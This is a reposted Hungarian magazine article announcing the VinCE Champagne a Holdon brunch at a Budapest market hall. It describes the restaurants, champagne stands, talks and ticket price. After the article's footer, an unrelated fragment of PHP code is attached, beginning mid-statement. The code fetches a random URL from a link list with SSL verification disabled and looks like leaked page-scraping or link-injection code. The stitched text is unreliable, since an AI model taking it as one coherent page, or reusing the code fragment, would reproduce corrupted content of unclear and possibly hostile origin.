Hamarosan újra itt a VinCE Champagne a Holdon!

Második alkalommal borítják be a buborékok Budapest első számú gasztropiacát, ugyanis december 9-én ismét jön a VinCE Champagne a Holdon. A vasárnap délutánba nyúló villásreggelire a pezsgők és champagne-ok rajongóit várják, hogy különféle ínyencségek mellett végigkóstolják a legjobb champagne-házak kínálatát. A VinCE Champagne a Holdon rendezvény célja, hogy az ünnepi szezon elején vendégül lássa mindazokat,... View Article


Második alkalommal borítják be a buborékok Budapest első számú gasztropiacát, ugyanis december 9-én ismét jön a VinCE Champagne a Holdon. A vasárnap délutánba nyúló villásreggelire a pezsgők és champagne-ok rajongóit várják, hogy különféle ínyencségek mellett végigkóstolják a legjobb champagne-házak kínálatát.

A VinCE Champagne a Holdon rendezvény célja, hogy az ünnepi szezon elején vendégül lássa mindazokat, akik reggel kilenctől már szívesen csatlakoznak egy bohém gasztrobulihoz. Ahol a palackokat akár szablyázni is lehet, s a töltött poharak mellé osztriga, kaviár, szarvasgomba is kérhető. Persze a csarnok éttermei szintén az alkalomhoz illő menükkel készülnek, és mindegyikük egy-egy champagne-házat képvisel.

Nyitva lesznek a piac legnépszerűbb helyei – köztük a Michelin-csillagos Széll Tamáshoz és Szulló Szabinához köthető Stand25 Bisztró is, és történt pár új nyitás is az idén. Bíró Lajosék A Séf utcája és a Buja Disznó-k mellett pezsgőbárrá változtatták a földszint egy részét, stílusosan az eseményen debütál a Champoint a 4 majomhoz. Izgalmas és elegáns vonalat képvisel új szereplőként az extravagáns kanadai séf, Anatoli Belov a Husikám élén.

A már jól ismert szereplők sorába tartozik a MoszkvaTér, ahol Nyíri Szása ismét lenyűgöző fogásokkal készül, de koccinthatunk akár Lakatos Márkkal a Lakatos Műhelyben, vagy Szabó Győzővel a Steamboo-ban! A szomszédos Kandalló Market a champagne-hoz illő burgert kínál, s a Haxen Market tradicionális ízei és közösségi asztalai már érkezéskor nagyon csábítóak. A földszinti részt erősíti a Vörös Homár gasztrobárja, ahol nemcsak komoly osztrigakínálat lesz, hanem izgalmas tengeri ételek is rendelhetők.

Nem mindennapi ínyencségekkel várja a vendégeket a helyszínre települő Arany Kaviár – náluk különböző kaviárokat és kaviáros fogásokat is kérhetünk majd, természetesen remek champagne-okkal kísérve.

Ritkán van alkalom arra is, hogy csúcsminőségű olasz szarvasgombákat kóstoljunk, de az Urbani standján erre is lesz módunk. A kiváló buborékok és melléjük alkotott ételek után – vagy közben – nem mindegy, milyen kávét kortyolunk: a By Beans üzletében a világ legjobb termőhelyeiről érkező különleges kávék sorakoznak Per Nordby által pörkölve, espresso vagy filter technológiával készítve.

A földszinti közösségi piac helyén Champagne-korzó várja a látogatókat, ez a sétálókóstoló helyszíne, ahol a champagne-standok kínálatából válogathatunk. Jól ismert nevek és a hazai piac új szereplői egyaránt megtalálhatóak lesznek a választékban, akár az önálló standokon, akár a VinCE pop up bárjában.

A kóstolgatás mellett lehetőség lesz alaposabban is megismerkedni a témával, vagyis a gyakorlat mellett elméleti tudásra is szert tehetünk. A VinCE Lounge területén zajlik majd a Sommelier’s Choice program, laza hangulatú minielőadások, beszélgetések a borok és champagne-ok világában jártas szakemberekkel, pezsgőspohárral a kézben.

A téli szezon legstílusosabb vasárnapi brunch eseményére elegáns öltözetet kap a piac, a dress kód a dressy coat, s a nap során a balatonfüredi Kredenc borbár rezidense, DJ Ernő Piaf szórakoztatja a közönséget. Érezhetnénk magunkat akár Párizsban vagy Lyonban is, de ezúttal Budapest egyik legszebb vásárcsarnoka „fürdik” a champagne-ban.

Az eseményre látogatók elővételben a Champagne a Holdon oldalán, és a helyszínen, készpénzes és kártyás fizetéssel is megvásárolhatják belépőiket, s érkezéskor máris egy pohár ajándék Alfred Gratien-nel kezdhetik a napot.

A belépőjegy ára (3990 Ft) nemcsak az első pohár pezsgőt tartalmazza, hanem a programokon való részvételt is, a kóstolandó buborékok vásárlása pedig a standoknál és az éttermekben történik, készpénzes és – helytől függően – bankkártyás fizetéssel.

Akár reggelizni, akár ebédelni, de mindenképp érdemes megérkezni délutánig a Belvárosi Piacra, hiszen ez a vasárnap egyedülállónak ígérkezik a kezdő és haladó ínyencek számára egyaránt.

További információ a Champagne a Holdon oldalán és az esemény Facebook oldalán érhető el.

(Visited 1 times, 2 visits today)

The post Hamarosan újra itt a VinCE Champagne a Holdon! appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>